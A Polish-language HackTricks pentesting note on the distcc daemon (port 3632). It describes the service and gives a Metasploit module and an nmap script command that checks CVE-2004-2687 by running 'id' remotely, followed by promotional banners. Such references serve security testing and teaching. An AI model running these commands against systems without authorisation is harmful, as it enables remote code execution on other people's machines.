hacktricks/network-services-pentesting/3632-pentesting-distcc.md
2024-02-11 01:46:25 +00:00

3.4 KiB

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Podstawowe informacje

Distcc to narzędzie, które usprawnia proces kompilacji, wykorzystując bezczynną moc obliczeniową innych komputerów w sieci. Gdy distcc jest skonfigurowany na maszynie, ta maszyna jest zdolna do rozprowadzania swoich zadań kompilacji na inny system. Ten system odbiorczy musi uruchamiać demona distccd i musi mieć zainstalowany kompatybilny kompilator, aby przetworzyć wysłany kod.

Domyślny port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Eksploatacja

Sprawdź, czy jest podatny na CVE-2004-2687 w celu wykonania dowolnego kodu:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Nie sądzę, żeby shodan wykrywał tę usługę.

Zasoby

Post utworzony przez Álex B (@r1p)

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: